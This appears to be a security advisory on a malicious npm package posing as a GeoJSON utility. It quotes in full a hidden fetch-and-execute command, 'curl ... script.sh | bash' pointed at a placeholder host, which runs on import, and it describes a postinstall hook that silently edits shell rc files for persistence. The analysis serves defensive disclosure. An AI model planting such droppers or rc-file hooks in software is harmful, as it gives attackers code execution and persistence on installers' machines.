@wacrot/infra-data-kitnpm

On any require() or import of @wacrot/infra-data-kit, src/index.js invokes addSupport() at module top level, which spawns a detached bash -c 'curl -fsSL https://example.com/script.sh | bash' via node:child_process with stdio ignored and errors swallowed by empty catch blocks. This is a textbook fetch-and-execute dropper embedded in a package advertised as a GeoJSON / data utility, and it fires automatically on import with no user consent or verification. Separately, package.json declares a postinstall hook (npx no-install @wacrot/infra-data-kit npm run scripts/setup.js) which executes scripts/setup.js at install time. setup.js locates the first of ~/.zshrc, ~/.bashrc, ~/.profile, makes a.bak copy, and inserts a new line into the file. The current inserted line is benign (export MY_CUSTOM_VAR='test'), but the primitive is silent, persistent modification of the installer's shell rc files on every install — the standard mechanism for attacker persistence via PATH/alias/source hooks. The atypical postinstall invocation through npx no-install further obscures lifecycle inspection. The destination URL https://example.com/script.sh is a placeholder; the mechanism is fully wired and any future republish or DNS pivot delivers attacker-controlled shell code to every installer.